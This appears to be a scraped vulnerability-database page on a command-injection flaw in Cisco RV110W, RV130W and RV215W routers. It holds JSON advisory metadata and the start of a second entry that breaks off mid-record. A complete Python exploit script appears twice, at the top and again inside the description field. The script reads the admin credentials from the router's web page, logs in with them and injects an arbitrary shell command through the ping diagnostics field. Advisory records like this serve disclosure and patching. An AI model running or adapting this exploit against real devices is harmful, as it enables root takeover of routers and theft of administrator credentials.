CVE : CVE-2014-0683, CVE-2015-6396
import os import sys import re import urllib import urllib2 import getopt import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
Usage: ./{script_name} 192.168.1.1 443 "reboot"
if name == "main": IP = argv[1] PORT = argv[2] CMD = argv[3]
# Get session key, Just access index page.
url = 'https://' + IP + ':' + PORT + '/'
req = urllib2.Request(url)
result = urllib2.urlopen(req)
res = result.read()
# parse 'admin_pwd'! -- Get credits
admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
# Get session_id by POST
req2 = urllib2.Request(url + "login.cgi")
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "0",
"change_action": "",
"enc": "1",
"user": admin_user,
"pwd": admin_pwd,
"sel_lang": "EN"
}
r = urllib2.urlopen(req2, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
# Execute your commands via diagnose command parameter, default command is `reboot`
req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req3.add_header('Origin', url)
req3.add_header('Upgrade-Insecure-Requests', 1)
req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
req3.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req3.add_header('Referer', url)
req3.add_header('Accept-Encoding', 'gzip, deflate')
req3.add_header('Accept-Language', 'en-US,en;q=0.9')
req3.add_header('Cookie', 'SessionID=')
data_cmd = {"submit_button": "Diagnostics",
"change_action": "gozila_cgi",
"submit_type": "start_ping",
"gui_action": "",
"traceroute_ip": "",
"commit": "1",
"ping_times": "3 |" + CMD + "|",
"ping_size": "64",
"wait_time": "4",
"ping_ip": "127.0.0.1",
"lookup_name": ""
}
r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201608-0273", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rv110w wireless-n vpn firewall", "scope": null, "trust": 1.2, "vendor": "cisco", "version": null }, { "model": "rv130w wireless-n multifunction vpn router", "scope": null, "trust": 1.2, "vendor": "cisco", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 1.2, "vendor": "cisco", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "*" }, { "model": "rv110w wireless-n vpn firewall", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "*" }, { "model": "rv130w wireless-n multifunction vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "*" }, { "model": "rv110w wireless-n vpn firewall", "scope": "eq", "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv130w wireless-n multifunction vpn router", "scope": "eq", "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 0.8, "vendor": "cisco", "version": null }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rv130w wireless-n multifunction vpn router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rv110w wireless-n vpn firewall", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rv215w wireless-n vpn router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.3.0.8" }, { "model": "rv130w wireless-n multifunction vpn router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.0.3.16" }, { "model": "rv110w wireless-n vpn firewall", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.2.1.7" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-06162" }, { "db": "BID", "id": "92269" }, { "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "db": "CNNVD", "id": "CNNVD-201608-173" }, { "db": "NVD", "id": "CVE-2015-6396" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:cisco:rv110w_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:cisco:rv215w_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-007226" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Adam Zielinski.", "sources": [ { "db": "BID", "id": "92269" } ], "trust": 0.3 }, "cve": "CVE-2015-6396", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CVE-2015-6396", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CNVD-2016-06162", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "VHN-84357", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2015-6396", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-6396", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2015-6396", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2016-06162", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201608-173", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-84357", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-06162" }, { "db": "VULHUB", "id": "VHN-84357" }, { "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "db": "CNNVD", "id": "CNNVD-201608-173" }, { "db": "NVD", "id": "CVE-2015-6396" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The CLI command parser on Cisco RV110W, RV130W, and RV215W devices allows local users to execute arbitrary shell commands as an administrator via crafted parameters, aka Bug IDs CSCuv90134, CSCux58161, and CSCux73567. shell A command execution vulnerability exists. The Cisco RV110WRV130W and RV215W are Cisco router products. Multiple Cisco Products are prone to a local command-injection vulnerability. \nA local attacker can exploit this issue to execute arbitrary commands on the host operating system with root privileges. \nThis issue being tracked by Cisco Bug IDs CSCuv90134, CSCux58161 and CSCux73567. \nThe following products are affected:\nRV110W Wireless-N VPN Firewall\nRV130W Wireless-N Multifunction VPN Router\nRV215W Wireless-N VPN Router. #!/usr/bin/env python2\n\n#####\n## Cisco RV110W Password Disclosure and OS Command Execute. \n### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)\n\n# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute\n# Date: 2018-08\n# Exploit Author: RySh\n# Vendor Homepage: https://www.cisco.com/\n# Version: 1.1.0.9\n# Tested on: RV110W 1.1.0.9\n# CVE : CVE-2014-0683, CVE-2015-6396\n\nimport os\nimport sys\nimport re\nimport urllib\nimport urllib2\nimport getopt\nimport json\n\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n###\n# Usage: ./{script_name} 192.168.1.1 443 \"reboot\"\n###\n\nif __name__ == \"__main__\":\n IP = argv[1]\n PORT = argv[2]\n CMD = argv[3]\n \n # Get session key, Just access index page. \n url = \u0027https://\u0027 + IP + \u0027:\u0027 + PORT + \u0027/\u0027\n req = urllib2.Request(url)\n result = urllib2.urlopen(req)\n res = result.read()\n \n # parse \u0027admin_pwd\u0027! -- Get credits\n admin_user = re.search(r\u0027.*(.*admin_name=\\\")(.*)\\\"\u0027, res).group().split(\"\\\"\")[1]\n admin_pwd = re.search(r\u0027.*(.*admin_pwd=\\\")(.{32})\u0027, res).group()[-32:]\n print \"Get Cred. Username = \" + admin_user + \", PassHash = \" + admin_pwd\n\n # Get session_id by POST\n req2 = urllib2.Request(url + \"login.cgi\")\n req2.add_header(\u0027Origin\u0027, url)\n req2.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n req2.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n req2.add_header(\u0027User-Agent\u0027,\n \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n req2.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n req2.add_header(\u0027Referer\u0027, url)\n req2.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n req2.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n req2.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n data = {\"submit_button\": \"login\",\n \"submit_type\": \"\",\n \"gui_action\": \"\",\n \"wait_time\": \"0\",\n \"change_action\": \"\",\n \"enc\": \"1\",\n \"user\": admin_user,\n \"pwd\": admin_pwd,\n \"sel_lang\": \"EN\"\n }\n r = urllib2.urlopen(req2, urllib.urlencode(data))\n resp = r.read()\n login_st = re.search(r\u0027.*login_st=\\d;\u0027, resp).group().split(\"=\")[1]\n session_id = re.search(r\u0027.*session_id.*\\\";\u0027, resp).group().split(\"\\\"\")[1]\n\n # Execute your commands via diagnose command parameter, default command is `reboot`\n req3 = urllib2.Request(url + \"apply.cgi;session_id=\" + session_id)\n req3.add_header(\u0027Origin\u0027, url)\n req3.add_header(\u0027Upgrade-Insecure-Requests\u0027, 1)\n req3.add_header(\u0027Content-Type\u0027, \u0027application/x-www-form-urlencoded\u0027)\n req3.add_header(\u0027User-Agent\u0027,\n \u0027Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)\u0027)\n req3.add_header(\u0027Accept\u0027, \u0027text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\u0027)\n req3.add_header(\u0027Referer\u0027, url)\n req3.add_header(\u0027Accept-Encoding\u0027, \u0027gzip, deflate\u0027)\n req3.add_header(\u0027Accept-Language\u0027, \u0027en-US,en;q=0.9\u0027)\n req3.add_header(\u0027Cookie\u0027, \u0027SessionID=\u0027)\n data_cmd = {\"submit_button\": \"Diagnostics\",\n \"change_action\": \"gozila_cgi\",\n \"submit_type\": \"start_ping\",\n \"gui_action\": \"\",\n \"traceroute_ip\": \"\",\n \"commit\": \"1\",\n \"ping_times\": \"3 |\" + CMD + \"|\",\n \"ping_size\": \"64\",\n \"wait_time\": \"4\",\n \"ping_ip\": \"127.0.0.1\",\n \"lookup_name\": \"\"\n }\n r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))\n \n\n", "sources": [ { "db": "NVD", "id": "CVE-2015-6396" }, { "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "db": "CNVD", "id": "CNVD-2016-06162" }, { "db": "BID", "id": "92269" }, { "db": "VULHUB", "id": "VHN-84357" }, { "db": "PACKETSTORM", "id": "150781" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-6396", "trust": 3.5 }, { "db": "BID", "id": "92269", "trust": 2.0 }, { "db": "EXPLOIT-DB", "id": "45986", "trust": 1.1 }, { "db": "SECTRACK", "id": "1036528", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2015-007226", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201608-173", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2016.1890", "trust": 0.6 }, { "db": "CNVD", "id": "CNVD-2016-06162", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-84357", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150781", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-06162" }, { "db": "VULHUB", "id": "VHN-84357" }, { "db": "BID", "id": "92269" }, { "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "db": "PACKETSTORM", "id": "150781" }, { "db": "CNNVD", "id": "CNNVD-201608-173" }, { "db": "NVD", "id": "CVE-2015-6396" } ] }, "id": "VAR-201608-0273", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2016-06162" }, { "db": "VULHUB", "id": "VHN-84357" } ], "trust": 1.233139435 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-06162" } ] }, "last_update_date": "2024-11-23T21:55:27.059000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160803-rv110_130w1", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1" }, { "title": "Patches for any command execution vulnerability in multiple Cisco products", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/80243" }, { "title": "Cisco RV110W , RV130W and RV215W Repair measures for device security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63566" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-06162" }, { "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "db": "CNNVD", "id": "CNNVD-201608-173" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-78", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-84357" }, { "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "db": "NVD", "id": "CVE-2015-6396" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160803-rv110_130w1" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/92269" }, { "trust": 1.1, "url": "https://www.exploit-db.com/exploits/45986/" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1036528" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6396" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6396" }, { "trust": 0.6, "url": "https://www.auscert.org.au/render.html?it=37422" }, { "trust": 0.4, "url": "http://www.cisco.com/" }, { "trust": 0.1, "url": "https://\u0027" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0683" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6396" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-06162" }, { "db": "VULHUB", "id": "VHN-84357" }, { "db": "BID", "id": "92269" }, { "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "db": "PACKETSTORM", "id": "150781" }, { "db": "CNNVD", "id": "CNNVD-201608-173" }, { "db": "NVD", "id": "CVE-2015-6396" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2016-06162" }, { "db": "VULHUB", "id": "VHN-84357" }, { "db": "BID", "id": "92269" }, { "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "db": "PACKETSTORM", "id": "150781" }, { "db": "CNNVD", "id": "CNNVD-201608-173" }, { "db": "NVD", "id": "CVE-2015-6396" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-08-09T00:00:00", "db": "CNVD", "id": "CNVD-2016-06162" }, { "date": "2016-08-08T00:00:00", "db": "VULHUB", "id": "VHN-84357" }, { "date": "2016-08-03T00:00:00", "db": "BID", "id": "92269" }, { "date": "2016-08-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "date": "2018-12-14T18:00:57", "db": "PACKETSTORM", "id": "150781" }, { "date": "2016-08-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201608-173" }, { "date": "2016-08-08T00:59:00.140000", "db": "NVD", "id": "CVE-2015-6396" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-08-09T00:00:00", "db": "CNVD", "id": "CNVD-2016-06162" }, { "date": "2018-12-15T00:00:00", "db": "VULHUB", "id": "VHN-84357" }, { "date": "2016-08-03T00:00:00", "db": "BID", "id": "92269" }, { "date": "2016-08-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-007226" }, { "date": "2016-08-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201608-173" }, { "date": "2024-11-21T02:34:55.313000", "db": "NVD", "id": "CVE-2015-6396" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "92269" }, { "db": "CNNVD", "id": "CNNVD-201608-173" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Cisco Device product CLI Any command with administrator privileges in the command parser shell Command execution vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-007226" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "operating system commend injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-201608-173" } ], "trust": 0.6 } }
var-202101-0819
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV The router is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0819", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "application extension platform", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.0.3.55" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130 vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv130w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv110w", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.3.1.7" }, { "model": "rv215w wireless-n vpn router", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.2.2.8" }, { "model": "rv215w wireless-n vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv130 vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "application extension platform", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv130w wireless-n multifunction vpn router", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "cisco rv110w wireless-n vpn firewall", "scope": null, "trust": 0.8, "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba", "version": null }, { "model": "rv110w", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv215w no", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null }, { "model": "rv130", "scope": null, "trust": 0.6, "vendor": "cisco", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2021-41174" }, { "db": "JVNDB", "id": "JVNDB-2021-002634" }, { "db": "NVD", "id": "CVE-2021-1213" } ] }, "cve": "CVE-2021-1213", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2021-1213", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CNVD-2021-41174", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, 